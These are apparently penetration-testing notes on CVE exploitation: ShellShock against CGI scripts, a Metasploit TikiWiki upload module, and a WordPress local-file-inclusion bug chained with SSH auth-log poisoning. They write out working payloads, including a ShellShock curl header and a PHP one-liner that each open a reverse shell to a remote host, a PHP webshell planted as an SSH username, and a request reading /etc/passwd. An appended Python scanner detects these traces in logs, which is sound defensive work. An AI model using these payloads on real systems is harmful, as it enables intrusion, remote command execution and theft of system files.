CVE exploitation

CGI ShellShock web vulnerabilities

https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/

# Directory Brute Forcing
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shellshock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5

# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi

# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec

# Python script to detect ShellShock: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL

TikiWiki File Upload vulnerability

To exploit the TikiWiki File Upload vulnerability, use the following Metasploit command to perform an unrestricted file upload:

# Use unix/webapp/tikiwiki_upload_exec
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default TikiWiki credentials are usually admin:admin
use unix/webapp/tikiwiki_upload_exec

Log Poisoning and LFI example CVE-2018-7422 (WordPress)

# Use the PHP payload as the SSH username so that sshd writes it into the auth log file
ssh '<?php system($_GET["c"]); ?>@IP'

# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Combine the LFI with the poisoned log: include the auth log and pass the command through the c parameter
ajax_path=var/log/auth.log&c=ifconfig

# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Explanation:

  • The ssh '<?php system($_GET["c"]); ?>@IP' command illustrates injecting a PHP payload into the SSH auth log so that it is later executed on the target system (log poisoning).

  • The LFI example shows how to read the /etc/passwd file through a vulnerable WordPress plugin, a path traversal / local file inclusion issue.

  • Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.

  • The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.
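Added detection example (not part of the original notes): a small log scanner that flags the two attack traces described above, the ShellShock function-definition pattern in web access logs and PHP tags written into sshd entries in auth.log. The log lines below are constructed samples; the Apache combined log and sshd message formats are assumed.

```python
import re

# Constructed sample data (not from the page): Apache combined-format access log entries
# whose last quoted field is the User-Agent header, and sshd lines as found in auth.log.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c id"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 128 "-" "() { ignored; }; echo test"
"""

AUTH_LOG = """\
Jan  1 10:01:00 web sshd[1201]: Invalid user <?php system($_GET["c"]); ?> from 10.0.0.5 port 4444
Jan  1 10:01:05 web sshd[1202]: Accepted publickey for deploy from 10.0.0.9 port 50022 ssh2
Jan  1 10:01:09 web sshd[1203]: Invalid user guest from 10.0.0.8 port 4445
"""

# ShellShock trigger: a Bash function definition "() {" ... "}" followed by ";" and a
# trailing command. Whitespace-tolerant so variations of the classic "() { :; };" match.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# PHP open tags ("<?php" or "<?=") landing in a log line built from attacker-controlled input.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
SOURCE_IP_RE = re.compile(r"from (\d{1,3}(?:\.\d{1,3}){3})")


def find_shellshock(lines):
    """Return (line_no, client_ip) for access-log lines carrying the ShellShock pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        if SHELLSHOCK_RE.search(line):
            hits.append((n, line.split()[0]))  # client IP is the first field
    return hits


def find_log_poisoning(lines):
    """Return (line_no, source_ip) for sshd lines where PHP tags appear in the username field."""
    hits = []
    for n, line in enumerate(lines, 1):
        if "sshd" in line and PHP_TAG_RE.search(line):
            m = SOURCE_IP_RE.search(line)
            hits.append((n, m.group(1) if m else None))
    return hits


if __name__ == "__main__":
    for n, ip in find_shellshock(ACCESS_LOG.splitlines()):
        print(f"access.log line {n}: ShellShock pattern in request from {ip}")
    for n, ip in find_log_poisoning(AUTH_LOG.splitlines()):
        print(f"auth.log line {n}: PHP tag in sshd entry from {ip}")
```

Either hit on a host that also serves PHP with a file-inclusion bug is a strong indicator that the log-poisoning chain above is in progress.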
